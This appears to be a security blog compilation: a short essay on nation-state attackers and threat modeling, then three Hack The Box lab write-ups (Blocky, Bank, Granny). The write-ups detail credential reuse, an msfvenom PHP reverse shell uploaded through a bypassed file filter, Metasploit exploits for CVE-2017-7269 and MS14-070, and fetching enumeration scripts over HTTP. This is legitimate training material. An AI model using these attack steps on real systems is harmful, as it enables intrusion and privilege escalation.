Nation State Attackers:

In 2018, nation state attackers were only responsible for 12% of all data breaches (Verizon Data Breach Report). However, they are generally well-trained, well-funded, and extremely motivated.

Unlike insiders (who are often not well-trained) or cyber criminals (who are generally not motivated to attack specific targets), once nation-state attackers (also known as APT, or Advanced Persistent Threats) have targeted your organization, they are unlikely to stop until they have penetrated the organization.

These types of attackers are often salaried employees, who are employed by intelligence agencies around the world. Nation state goals vary by country, but are generally designed to advance the country's political and economic goals.

These attackers are known for a range of tactics (anything which will help them compromise your organization), but have been known to use spear phishing attacks, custom malware, and zero day attacks.

Unlike cyber criminals who want to quickly monetize assets, nation state attackers will often seek long term access to your infrastructure. They will do their best to gain initial access quietly (and through multiple entry points), then move quietly through your networks, mapping out as much as they can. That way, they’re less likely to be caught, more likely to find their target, and exfiltrate data without being caught.

Protecting against these organizations depends upon strong security fundamentals throughout your organization (such as patch and vulnerability management programs, security awareness programs, monitoring and detection, and effective incident response, among others), and more advanced protections (such as threat intelligence, which can help you identify the threat actors which may target your organization).

Why does it matter what kind of attackers are targeting my organization?

Since resources aren't infinite, every security program needs to prioritize some protections over others and can't protect effectively against all attacks. They may also have limited ability to implement controls based on the needs of the business.

An effective security team needs to choose how to spend their influence wisely when recommending a security tool.

Given that, one philosophy of how to choose which controls to prioritize is to perform ‘threat modeling’.

At a very high level, threat modeling is designed to determine the organization's most valuable assets (or 'crown jewels') and identify the threat actors (both by high level type, and even specific groups) which are most likely to attack the organization. This may also involve determining which attacks, or types of attacks, the organization is likely to encounter.

This information can help the security team determine what controls will be most effective for their environment and will provide the greatest protection for the cost. Then, the team can prioritize the most important security measures for their environment, and best use limited resources and limited influence to protect their environment from the threats they're most likely to face.

Note. Only write-ups of retired HTB machines are allowed.

Blocky is fairly simple overall, and was based on a real-world machine. It demonstrates the risks of bad password practices as well as exposing internal files on a public facing system.

We will use the following tools to pawn the box on a Kali Linux box:

• nmap
• nikto
• gobuster
• wpscan
• jd-gui
• hash-identifier

Let's get started.

I add blocky on the /etc/hosts file

nano /etc/hosts

with

10.10.10.37     blocky.htb

Step 1 - Reconnaissance

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

Port scanning

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

I use the following command to perform an intensive scan:

nmap -A -v blocky.htb

-A: Enable OS detection, version detection, script scanning, and traceroute

-v: Increase verbosity level

blocky.htb: hostname for the Blocky box

If you find the results a little bit too overwhelming, you can do another command to get only the open ports.

nmap blocky.htb

We can see that there are 3 open ports:

Port 21, File Transfer Protocol (FTP) control (command)

Port 22, Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding

Port 80, most often used by Hypertext Transfer Protocol (HTTP)

Directory scanning

I use Gobuster. Gobuster is a directory scanner written in Go. More info on the tool here. Gobuster uses wordlists on Kali which are located in the /usr/share/wordlists directory. I'm using wordlists from dirb and dirbuster, but you can download more wordlists from SecLists here

I use this command for the dirb common.txt wordlist

gobuster dir -u blocky.htb -w /usr/share/wordlists/dirb/common.txt

We can see some there are WordPress directories (wp-admin, wp-content-wp-includes). There is also a couple of other interesting pages (/phpmyadmin and /plugins)

I use Nikto.

Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.

More info on the tool here

I use this command to launch the scan

nikto -host blocky.htb

I see a couple of directories that could be interesting (/wp-content/uploads/ and /wp-login.php)

Finally I use WPScan. WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues

I use this command to launch the scan

wpscan --url blocky.htb -e

We have one username, Notch

Step 2 - Visiting the web page

Let's visit the pages we found from the reconnaissance phase. Let's start by the main web page. It's a blog on Minecraft - BlockyCraft

I look at the wiki page. Nothing interesting

I have a look at the /wp-content/uploads page. Nothing interesting

I find the admin panel

as well as the phpMyAdmin panel

I navigate to the /plugins folder and find two jar files.

A JAR is a package file format typically used to aggregate many Java class files and associated metadata and resources into one file for distribution. JAR files are archive files that include a Java-specific manifest file. They are built on the ZIP format and typically have a .jar file extension

I download both zip files on my Kali box

I use JD-Gui to be decompile the java files. JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. More info on the tool here

I launch the tool with

jd-gui

And then select the JAVA class I want to read - BlockyCore.class

I can see a username and a password

I navigate back to phpMyAdmin and enter the credentials I just found. I have access to the database

I have a look at the table wp_users within the wordpress folder to see if I can get more information about the users of the blog

The SQL query

SELECT * FROM `wp_users`

which can be translated by select all the users from the table wp_users would only give us one result, Notch

I use hash-identifier to identify the possible hash. Hash-identifier is a software to identify the different types of hashes used to encrypt data and especially passwords. You can find more information here.

I launch hash-identifier with the following command:

hash-identifier

and copy/paste the hashed password I got earlier:

We see the hash is most likely to be an MD5 (Wordpress) hash

Step 3 - Using the port 22

I'm back on my terminal and connect using SSH

The SSH protocol (also referred to as Secure Shell) is a method for secure remote login from one computer to another. It provides several alternative options for strong authentication, and it protects the communications security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).

More info here on the SSH Protocol

I use the following command

ssh notch@10.10.10.37

and I enter the password I found on the BlockyCore.class file earlier

Step 4 - Looking for the user.txt flag

I'm now connected as Notch. I list all the folders/files

I find the user.txt file!

To read the content of the file I use the command

cat user.txt

Now that we have the user flag, let's find the root flag!

Step 5 - Performing Privilege Escalation

I check the current access user with sudo.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for "superuser do" as the older versions of sudo were designed to run commands only as the superuser

More info on sudo here

I list the user's privileges with this command

sudo -l

I use the same password I found previously

I can see that Notch has unlimited privileges and can run any command on the system. I check the id. The id command in Linux is used to find out user and group names and numeric ID’s of the current user or any other user in the server

I escalate to root using this command

sudo su

Step 6 - Looking for the root.txt flag

I am now a root user and can navigate to the root folder

I find the root.txt file!

To read the content of the file I use the command

cat root.txt

Congrats! You found both flags!

Please don’t hesitate to comment, ask questions or share with your friends :)

You can see more of my articles here

You can follow me on Twitter or on LinkedIn

And don't forget to #GetSecure, #BeSecure & #StaySecure!

Other Hack The Box articles

• Keep Calm and Hack The Box - Lame
• Keep Calm and Hack The Box - Legacy
• Keep Calm and Hack The Box - Devel
• Keep Calm and Hack The Box - Beep
• Keep Calm and Hack The Box - Optimum
• Keep Calm and Hack The Box - Arctic
• Keep Calm and Hack The Box - Grandpa
• Keep Calm and Hack The Box - Granny
• Keep Calm and Hack The Box - Bank

Note. Only write-ups of retired HTB machines are allowed.

Bank is a relatively simple machine, however proper web enumeration is key to finding the necessary data for entry

We will use the following tools to pawn the box on a Kali Linux box:

• nmap
• gobuster
• Searchsploit
• msfconsole
• metasploit
• meterperter
• LinEnum

Let's get started.

Step 1 - Reconnaissance

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

Port scanning

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

I use the following command to perform an intensive scan:

nmap -A -v bank.htb

-A: Enable OS detection, version detection, script scanning, and traceroute

-v: Increase verbosity level

bank.htb: hostname for the Bank box

If you find the results a little bit too overwhelming, you can do another command to get only the open ports.

nmap bank.htb

We can see that there are 3 open ports:

Port 22, Secure Shell (SSH), secure logins, file transfers (scp, sftp) and port forwarding

Port 53, Domain Name System (DNS)

Port 80, most often used by Hypertext Transfer Protocol (HTTP)

Directory scanning

I use Gobuster. Gobuster is a directory scanner written in Go. More info on the tool here. Gobuster uses wordlists on Kali which are located in the /usr/share/wordlists directory. I'm using wordlists from dirb and dirbuster, but you can download more wordlists from SecLists here

I use this command for the dirb common.txt wordlist

gobuster dir -u bank.htb -w /usr/share/wordlists/dirb/common.txt

I can see some interesting folders. I do another directory scan with a different wordlist.

gobuster dir -u bank.htb -w /usr/share/worldlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Step 2 - Visiting the web page

From the reconnaissance phase, I decide to start with port 80. It points to an Apache2 Ubuntu Default page. We need to set the hostname. We will follow the standard convention for the HTB machines, bank.htb

I add bank on the /etc/hosts file

nano /etc/hosts

with

10.10.10.29     bank.htb

I check the file with

cat /etc/hosts

When I navigate to bank.htb, I can see a login page now

From the gobuster reconnaissance, I found some folders. I navigate to /balance-transfer

I have a look at a couple of files. All the files seems to have the full name, email and password encrypted.

I go back to the main page and I click on the Size tab to sort the transfers. I can see that one of the file is different

When I click on the file, I see an error message at the top. The encryption failed for this file. I can see all the details in plain text

I go back to the login panel and enter the credentials. I now have access to the dashboard of the HTB Bank. Nothing interesting on this page, so I move to the Support page

On the Support page, I can upload files. I will try to upload a payload

Step 3 - Using MSFvenom to craft an exploit

We will use MSFvenom, which is a payload generator . You can learn more about it here

But first, let's see on Metasploit Framework which payload we could use to craft our exploit

We know that we need to create a reverse shell, which is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.

https://resources.infosecinstitute.com/icmp-reverse-shell/

The reverse TCP shell should be for PHP and we will use Meterpreter

From the Offensive Security website, we get this definition for Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

You can read more about Meterpreter here

I launch Metasploit and search for reverse TCP payloads. I use the following command

search php meterpreter reverse_tcp

I find an interesting payload, number 594, which is a Reverse TCP Stager. This payload injects the meterpreter server DLL via the Reflective Dll Injection payload and connects back to the attacker

payload/php/meterpreter/reverse_tcp

Now let's go back to msfvenom to craft our exploit

I use the following command

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.36 lport=443 -f raw > HTBbankshell.php

I then check with ls if the file has been created

and I cat the file to see the exploit with

cat HTBbankshell.php

I go back to the support page. I add the title, the message and upload the file on the form

I click on the submit button and I see an error message. The file type doesn't seem to work

I check the source code and I see a comment that indicates that the file extension .htb is needed to execute php for debugging purposes only

I then change the extension of my payload from HTBbankshell.php to HTBbankshell.htb

My file is now ready to be uploaded on the support page

And it seems to work! The payload has been uploaded on the support page

Step 4 - Setting up a listener with Metasploit

Back on Metasploit where I use the following command to set the payload handler

use exploit/multi/handler

I first set up the payload

set payload php/meterpreter/reverse_tcp

Then the LHOST

set lhost 10.10.14.36

And finally the LPORT

set lport 4444

If we check the options now, we should see that everything is set up

Let's run the exploit.

After this message appears

Started reverse TCP handler on 10.10.14.36:4444

go back to the browser and refresh the page where the malicious script is hosted

bank.htb/uploads/HTBbankshell.php

You should then see a Meterpreter session created

I start by gathering some information with getuid which returns the real user ID of the calling process and sysinfo

Step 5 - Looking for the user.txt flag

I start navigating to root and list the folders/files.

I move to the home directory with

cd home

And I can see a user called chris

I move to the chris directory and when I list the files...

I find the user.txt file! To read the content of the file I use the command

cat user.txt

Now that we have the user flag, let's find the root flag!

Step 6 - Performing Privilege Escalation

I try to navigate to the root folder and the access is denied

I will use LinEnum to enumerate more information from this machine. LinEnum is used for scripted local Linux enumeration and privilege escalation checks. More info here

I fetch LinEnum from GitHub with

wget https://https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

I check with this command if the script has been correctly fetched

ls -la

I use the following command

chmod 777 LinEnum.sh

to change the file permission and make it readable, writable and executable by everyone

Within meterpreter I check the location of the file with

lls -S "LinEnum.sh"

I start a php server on another terminal with

php -S 10.10.14.36:4444

I type the following command to get a standard shell on the target system

shell

I spawn a TTY shell with

python3 -c 'import pty;pty.spawn("/bin/bash/")'

And I transfer the file to the machine with

wget http://10.10.14.36:4444/LinEnum.sh -O /tmp/LinEnum.sh

where I copy the file from my Kali box to the machine temp folder

I then navigate to the temp folder to check if the file has been correctly moved

I then run the script with

sh ./LinEnum.sh

The scan gives me a lot of information. I look for the interesting files section. I check the SUID files section. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it

I spot an interesting file

/var/htb/bin/emergency

I navigate to var/htb/emergency

I run it with

./emergency

and I'm asked if I want to get a root shell :)

I have root access to the machine

I can now navigate to the root folder

I find the root.txt file!

To read the content of the file I use the command

cat root.txt

Congrats! You found both flags!

Please don’t hesitate to comment, ask questions or share with your friends :)

You can see more of my articles here

You can follow me on Twitter or on LinkedIn

And don't forget to #GetSecure, #BeSecure & #StaySecure!

Other Hack The Box articles

• Keep Calm and Hack The Box - Lame
• Keep Calm and Hack The Box - Legacy
• Keep Calm and Hack The Box - Devel
• Keep Calm and Hack The Box - Beep
• Keep Calm and Hack The Box - Optimum
• Keep Calm and Hack The Box - Arctic
• Keep Calm and Hack The Box - Grandpa
• Keep Calm and Hack The Box - Granny

Note. Only write-ups of retired HTB machines are allowed.

Granny, similarly to Grandpa, can be exploited using several different methods like the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge.

We will use the following tools to pawn the box on a Kali Linux box:

• nmap
• Searchsploit
• davtest
• Metasploit
• Local exploit suggester

Let's get started.

I add granny on the /etc/hosts file

nano /etc/hosts

with

10.10.10.15     granny.htb

Step 1 - Reconnaissance

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

Port scanning

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

I use the following command to perform an intensive scan:

nmap -A -v granny.htb

-A: Enable OS detection, version detection, script scanning, and traceroute

-v: Increase verbosity level

granny.htb: hostname for the Granny box

If you find the results a little bit too overwhelming, you can do another command to get only the open ports.

nmap granny.htb

We can see that there is only 1 open port:

Port 80, most often used by Hypertext Transfer Protocol (HTTP)

We know that the server is an IIS 6.0 from the http-server-header. Internet Information Services (IIS, formerly Internet Information Server) is an extensible web server software created by Microsoft for use with the Windows NT family. More info here.

IIS 6.0 (code name "Duct Tape"), included with Windows Server 2003 and Windows XP Professional x64 Edition, added support for IPv6 and included a new worker process model that increased security as well as reliability HTTP.sys was introduced in IIS 6.0 as an HTTP-specific protocol listener for HTTP requests

We can also see from the http-title that the website is "under construction" and that there is a http-webdav-scan with all the allowed methods.

I use another nmap script to try to get more information. The script sends an OPTIONS request which lists the dav type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal IP addresses by doing pattern matching in the response body

nmap --script http-webdav-scan -p80 granny.htb

Here is more info on this script from the nmap website.

WebDAV or Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operations. More info here.

We can see on the server support section that Microsoft's IIS has a WebDAV module.

I use davtest to check if I can upload files.

I use the following command:

davtest -url granny.htb

It doesn't look like I can upload files. I use Searchsploit to check if there is any known vulnerability on IIS 6.0. Searchsploit is a command line search tool for Exploit Database.

I use the following command:

searchsploit iis 6.0

I can get more details on the exploit with:

searchsploit -x 41738.py

The attack is based on a Return-oriented programming chain. Return-oriented programming (ROP) is a security exploit technique that allows an attacker to execute code in the presence of security defense such as executable space protection and code signing.

You can also check the Exploit Database to find the exploit.

https://www.exploit-db.com/search?q=iis+6.0

https://www.exploit-db.com/exploits/41738

The National Vulnerability Database,

https://nvd.nist.gov/vuln/detail/CVE-2017-7269

and the Common Vulnerabilities and Exposure database are also worth checking.

https://www.cvedetails.com/cve/CVE-2017-7269/

There is one Metasploit module available.

_https://www.rapid7.com/db/modules/exploit/windows/iis/iis_webdav_scstoragepathfromurl_

Step 2 - Visiting the website

We don't see much when visiting the website. From the developer console, we can see it's powered by the ASP.NET framework

We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders

https://www.metasploit.com/

I launch the Metasploit Framework on Kali and look for the command I should use to launch the exploit.

If I use this command

searchsploit iis 6.0

I get the same table that I had from the Terminal earlier.

If I type

search iis 6.0

I get 174 results.

The exploit I'm interested in is number 147 on this list.

If you want to get more information about the exploit, you can use the following command:

info exploit/windows/iis/iis_webdav_scstoragepathfromurl

I use the following command to use the exploit:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

I need to set up the options before launching the exploit. I check the options with

show options

I set the RHOSTS with the following command:

set RHOSTS granny.htb

When I check again the options, I get this:

I check if the target is vulnerable with

check

Then I run the exploit with the command

exploit

And I get a Meterpreter session.

Here's the definition of Meterpreter from Offensive Security:

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

You can read more about Meterpreter here.

Let's start by gathering some information.

getuid returns the real user ID of the calling process. The session I got doesn't seem to have enough privileges to run this command. Access is denied:

When this happens, I list the running processes with

ps

and pick one running NT AUTHORITY\NETWORK SERVICE

I migrate to the process 792 with

migrate 792

Now when I check getuid, I get

Server username: NT AUTHORITY\NETWORK SERVICE

This is the session I got after migrating to another process

I type the following command to get a standard shell on the target system

shell

I check who I am on the machine with the command

whoami

I get more information from the machine with

systeminfo

I navigate to C:\

then Documents and Settings with

cd "Documents and Settings"

I can see two users – Administrator and Lakis. I try to navigate to Lakis. Access is denied. Same for the administrator folder – which is expected as I don't have root access yet.

I exit the shell with the command

exit

Step 3 - Using local exploit suggester

I run the local exploit suggester. The exploits are suggested based on the architecture and the platform the user has the shell open in, along with the available exploits in meterpreter.

run post/multi/recon/local_exploit_suggester

I will use the MS14-070 exploit. I look for some more information on Metasploit with

info exploit/windows/local/ms14_070_tcpip_ioctl

As well as on the Rapid7 website

_https://www.rapid7.com/db/modules/exploit/windows/local/ms14_070_tcpip_ioctl_

Step 4 - Using MS14-070 to perform privilege escalation

I put this session in the background with the command

background

I run the following command to use the exploit I found

use exploit/windows/local/ms14_070_tcpip_ioctl

I then check for the options of this exploit

I set the session with

set SESSION 1

I run the exploit with

run

The exploit succeeded, but I didn't get a shell back. I check the options

and set the LHOST to my IP with

set LHOST 10.10.14.36

You can check yours here.

I then run the exploit with

exploit

This confirms that the exploit has succeeded, but I still don't get a shell. I check the session with

sessions -l

I should have

NT AUTHORITY\SYSTEM

Which is not the case now, so I go back to this session with

sessions -i 1

I check getuid and get NT AUTHORITY\SYSTEM back. I get a standard shell on the target system and check who am I on the machine. I get NT AUTHORITY\NETWORK SERVICE back, which is not what I want!

I exit this shell and check the processes. I can see that I have admin access on the machine. I just meed to migrate to another process, which I do with

migrate 408

I'm back to the standard shell on the target system. And when I check who I am on the machine, I'm finally an admin!

Step 5 - Looking for the user.txt flag

I navigate to the Lakis folder from Documents and Settings.

I can list all the files/folders with the following command

dir

I then move to the Desktop

And I find the user flag! I can check the contents of the file with

type user.txt

Step 6 - Looking for the root.txt flag

Let's find the root flag now! I navigate up to Users and check in to the Administrator/Desktop folder. I find the flag!

I use the following command to see the content of the file

type root.txt

Congrats! You found both flags!

Please don’t hesitate to comment, ask questions or share with your friends :)

You can see more of my articles here.

You can follow me on Twitter or on LinkedIn.

And don't forget to #GetSecure, #BeSecure & #StaySecure!

Other Hack The Box articles

• Keep Calm and Hack The Box - Lame
• Keep Calm and Hack The Box - Legacy
• Keep Calm and Hack The Box - Devel
• Keep Calm and Hack The Box - Beep
• Keep Calm and Hack The Box - Optimum
• Keep Calm and Hack The Box - Arctic
• Keep Calm and Hack The Box - Grandpa